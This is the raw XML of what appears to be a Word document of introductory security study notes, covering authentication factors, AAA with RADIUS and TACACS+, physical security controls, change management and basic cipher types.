                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C4DCACD" w14:textId="572A52F1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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Authentication app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F69D42B" w14:textId="77777777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8" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59FD4A37" w14:textId="77777777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  <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6514FC97" w14:textId="381FECC5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20960" w:rsidRPr="005B4891" w14:paraId="36A94A01" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BD4CACD" w14:textId="77777777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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D7500E7" w14:textId="21A54880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B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Compliant device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CB05D02" w14:textId="77777777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8" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74ECED51" w14:textId="77777777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  <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4059233A" w14:textId="77777777" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="00520960" w:rsidP="0052096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A97D46D" w14:textId="77777777" w:rsidR="00536C4E" w:rsidRPr="005B4891" w:rsidRDefault="00536C4E" w:rsidP="00C05AC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D93F25" w14:textId="73DA206E" w:rsidR="00905A81" w:rsidRPr="005B4891" w:rsidRDefault="001F5C9D" w:rsidP="00E432FB">
      <w:pPr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PIN = Personal identification number</w:t>
      </w:r>
      <w:r w:rsidR="00E432FB" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E432FB" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00905A81" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tied to the hardware and stored in the TPM</w:t>
      </w:r>
      <w:r w:rsidR="00E432FB" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3105929A" w14:textId="32B7DAE7" w:rsidR="00905A81" w:rsidRPr="005B4891" w:rsidRDefault="00905A81" w:rsidP="00E432FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2902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TP</w:t>
      </w:r>
      <w:r w:rsidR="00E432FB" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M = Trusted Platform Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CBBA4D" w14:textId="36F69F74" w:rsidR="00211CCC" w:rsidRPr="005B4891" w:rsidRDefault="00211CCC" w:rsidP="00D0342C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Smartcard = Cryptographic token</w:t>
      </w:r>
      <w:r w:rsidR="00D0342C" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D465CBE" w14:textId="77777777" w:rsidR="00D0342C" w:rsidRPr="005B4891" w:rsidRDefault="00D0342C" w:rsidP="00D0342C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60A33222" w14:textId="319289B0" w:rsidR="00D0342C" w:rsidRPr="005B4891" w:rsidRDefault="00D0342C" w:rsidP="00D0342C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Windows has bitlocker which uses network unlock</w:t>
      </w:r>
      <w:r w:rsidR="00B10D9F" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, when you connect to a trusted location the encryption within the OS unlocks bitlocker</w:t>
      </w:r>
      <w:r w:rsidR="00F84AB5" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is based on Geo-location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7697B" w14:textId="77777777" w:rsidR="007C45C4" w:rsidRPr="005B4891" w:rsidRDefault="007C45C4" w:rsidP="00D0342C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75B33C6B" w14:textId="77777777" w:rsidR="004A6C3C" w:rsidRPr="005B4891" w:rsidRDefault="004A6C3C" w:rsidP="00D0342C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0BB6D1AF" w14:textId="77777777" w:rsidR="004A6C3C" w:rsidRPr="005B4891" w:rsidRDefault="004A6C3C" w:rsidP="00D0342C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4EE12487" w14:textId="77777777" w:rsidR="004A6C3C" w:rsidRPr="005B4891" w:rsidRDefault="004A6C3C" w:rsidP="00D0342C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378C7913" w14:textId="18C626A3" w:rsidR="00DD51AD" w:rsidRPr="00A05553" w:rsidRDefault="00A348AD" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc198019357"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="008E01DE" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AAA = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identity</w:t>
      </w:r>
      <w:r w:rsidR="009104C4" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E01DE" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidR="00367094" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, Authorization and </w:t>
      </w:r>
      <w:r w:rsidR="00F704E8" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accounting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7E409954" w14:textId="2092B73E" w:rsidR="00F704E8" w:rsidRPr="005B4891" w:rsidRDefault="00DD51AD" w:rsidP="00D0342C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Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAF7C3" w14:textId="0BF4FFCD" w:rsidR="00DD51AD" w:rsidRPr="005B4891" w:rsidRDefault="00DD51AD" w:rsidP="00DD51AD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Proving identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712BDCA" w14:textId="0B266C67" w:rsidR="009104C4" w:rsidRPr="005B4891" w:rsidRDefault="009104C4" w:rsidP="009104C4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Who are you? Prove it!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183864A5" w14:textId="78D178C3" w:rsidR="00DD51AD" w:rsidRPr="005B4891" w:rsidRDefault="00DD51AD" w:rsidP="009104C4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MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33168183" w14:textId="484C343B" w:rsidR="0093136B" w:rsidRPr="005B4891" w:rsidRDefault="0093136B" w:rsidP="009104C4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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidR="00386D96" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>can you do</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00F43326" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00386D96" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">What did you do? </w:t>
      </w:r>
      <w:r w:rsidR="00F43326" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(example: logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42142791" w14:textId="4CDFBF98" w:rsidR="0037575D" w:rsidRPr="005B4891" w:rsidRDefault="0037575D" w:rsidP="009104C4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 xml:space="preserve">RADIUS </w:t>
      </w:r>
      <w:r w:rsidR="00AA233A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote Acces</w:t>
      </w:r>
      <w:r w:rsidR="00AA233A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s Dial-In User Service</w:t>
      </w:r>
      <w:r w:rsidR="00C716C9" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C716C9" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Centralized system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CA2EB" w14:textId="1349223A" w:rsidR="00EA2F67" w:rsidRPr="005B4891" w:rsidRDefault="00631B1A" w:rsidP="00EA2F67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 xml:space="preserve">TACACS Plus = </w:t>
      </w:r>
      <w:r w:rsidR="005508CC" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Terminal Access Control</w:t>
      </w:r>
      <w:r w:rsidR="00626427" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access Control System Plus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D230FAE" w14:textId="7E526E74" w:rsidR="00EA2F67" w:rsidRPr="005B4891" w:rsidRDefault="00EA2F67" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc198019358"/>
      <w:r w:rsidRPr="005B4891">
        <w:t>Physical Security</w:t>
      </w:r>
      <w:r w:rsidR="005504EA" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> foundations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1A50FD82" w14:textId="6337CEF2" w:rsidR="00EA2F67" w:rsidRPr="005B4891" w:rsidRDefault="004364EC" w:rsidP="004364EC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 xml:space="preserve">Guards, </w:t>
      </w:r>
      <w:r w:rsidR="00E77C96" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gates and guns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A592C" w14:textId="3299E482" w:rsidR="007B55F3" w:rsidRPr="005B4891" w:rsidRDefault="007B55F3" w:rsidP="004364EC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Barriers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34161F8F" w14:textId="78FB5CC9" w:rsidR="00A834CA" w:rsidRPr="005B4891" w:rsidRDefault="00A834CA" w:rsidP="004364EC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Fences = boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDEF1D" w14:textId="4EE24498" w:rsidR="004D4578" w:rsidRPr="005B4891" w:rsidRDefault="004D4578" w:rsidP="004364EC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CCTV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2D628" w14:textId="751F17B2" w:rsidR="00281FFD" w:rsidRPr="005B4891" w:rsidRDefault="00281FFD" w:rsidP="004364EC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Motion sensors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656B884" w14:textId="64FA4C1D" w:rsidR="005466CC" w:rsidRPr="005B4891" w:rsidRDefault="005466CC" w:rsidP="004364EC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Signs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25480194" w14:textId="18B74DB7" w:rsidR="004360E1" w:rsidRPr="005B4891" w:rsidRDefault="00826F9B" w:rsidP="004364EC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A s</w:t>
      </w:r>
      <w:r w:rsidR="004360E1" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>afe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312CA94" w14:textId="2C2A9C71" w:rsidR="005372BF" w:rsidRPr="005B4891" w:rsidRDefault="005372BF" w:rsidP="004364EC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A lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FE23E4" w14:textId="4B2D1C67" w:rsidR="004D4578" w:rsidRPr="005B4891" w:rsidRDefault="00962883" w:rsidP="004364EC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Access</w:t>
      </w:r>
      <w:r w:rsidR="00826F9B" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D4578" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cards</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Keyfob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F5ADE" w14:textId="034F0789" w:rsidR="00303492" w:rsidRPr="005B4891" w:rsidRDefault="00BB2FDC" w:rsidP="007C45C4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 xml:space="preserve">Secure access </w:t>
      </w:r>
      <w:r w:rsidR="002B645B" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vestibules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A655D" w14:textId="77777777" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="00520960" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD93589" w14:textId="77777777" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="00520960" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6F11B4" w14:textId="77777777" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="00520960" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143B8E79" w14:textId="06ECCAE0" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="00520960" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE154D" w14:textId="38E715C9" w:rsidR="004E28D2" w:rsidRPr="00A05553" w:rsidRDefault="00975A5B" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc198019359"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Operations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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</w:tblGrid>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="369B6284" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD67034" w14:textId="3D235E36" w:rsidR="00C63F42" w:rsidRPr="005B4891" w:rsidRDefault="00C63F42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Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="04793E96" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021F43D0" w14:textId="288A4FF2" w:rsidR="00C63F42" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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Approval process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="74B69B40" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A62A091" w14:textId="6C9761F6" w:rsidR="00C63F42" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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Ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="668E763F" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6EED33" w14:textId="0B76324F" w:rsidR="00A02BEB" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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Impact analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="0118F802" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E21D431" w14:textId="77777777" w:rsidR="00C63F42" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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SOP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025B3BFD" w14:textId="0483AB3D" w:rsidR="00A02BEB" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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Standard Operating Procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="32B0F258" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35EF26D1" w14:textId="0F516A99" w:rsidR="00C63F42" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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Maintenance window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63F42" w:rsidRPr="005B4891" w14:paraId="5F8CEEBF" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66A192E3" w14:textId="00F64F17" w:rsidR="00C63F42" w:rsidRPr="005B4891" w:rsidRDefault="00A02BEB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Backout plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A6C3C" w:rsidRPr="005B4891" w14:paraId="68C55743" w14:textId="77777777" w:rsidTr="00C63F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5833BB" w14:textId="77777777" w:rsidR="004A6C3C" w:rsidRPr="005B4891" w:rsidRDefault="004A6C3C" w:rsidP="004A6C3C">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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67CCCF8" w14:textId="77777777" w:rsidR="004A6C3C" w:rsidRPr="005B4891" w:rsidRDefault="004A6C3C" w:rsidP="00DF0830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086B27B4" w14:textId="29B36B67" w:rsidR="00D65530" w:rsidRPr="005B4891" w:rsidRDefault="00D65530" w:rsidP="00DF0830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Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504A7A35" w14:textId="50FF2C32" w:rsidR="00D65530" w:rsidRPr="005B4891" w:rsidRDefault="00D65530" w:rsidP="00303492">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2902"/>
          <w:tab w:val="left" w:pos="5118"/>
        </w:tabs>
        <w:ind w:left="360"/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Ciphers</w:t>
      </w:r>
      <w:r w:rsidR="00F036EA" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00B11F86" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mathematical functions or also called a</w:t>
      </w:r>
      <w:r w:rsidR="00F036EA" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lgorithm </w:t>
      </w:r>
      <w:r w:rsidR="00B11F86" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">is the operation that will produce </w:t>
      </w:r>
      <w:r w:rsidR="0016416C" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the encrypted or scrambled output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2276E469" w14:textId="4A01E9A2" w:rsidR="000E61D3" w:rsidRPr="005B4891" w:rsidRDefault="000E61D3" w:rsidP="00303492">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2902"/>
          <w:tab w:val="left" w:pos="5118"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="466CC311" wp14:editId="056AB00F">
            <wp:extent cx="5760720" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="625689448" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, Font, li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89448" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, Font, line&#10;&#10;KI-generert innhold kan være feil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4E71" w14:textId="2A4A134D" w:rsidR="00C272A7" w:rsidRPr="005B4891" w:rsidRDefault="00D65530" w:rsidP="000E61D3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Block Cipher</w:t>
      </w:r>
      <w:r w:rsidR="00193CA7" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (more complex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9E6CD" w14:textId="030C0905" w:rsidR="003521D2" w:rsidRPr="005B4891" w:rsidRDefault="004550B8" w:rsidP="003521D2">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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Blocks</w:t>
      </w:r>
      <w:r w:rsidR="00EA2FB0" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = variable </w:t>
      </w:r>
      <w:r w:rsidR="00A353ED" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>length block sizes and encrypt each block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E08A3E" w14:textId="3F4BA6AC" w:rsidR="00C272A7" w:rsidRPr="005B4891" w:rsidRDefault="00D65530" w:rsidP="000E61D3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St</w:t>
      </w:r>
      <w:r w:rsidR="00C272A7" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ream Ciphers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8C58F" w14:textId="27D69074" w:rsidR="004550B8" w:rsidRPr="005B4891" w:rsidRDefault="004550B8" w:rsidP="00C272A7">
      <w:pPr>
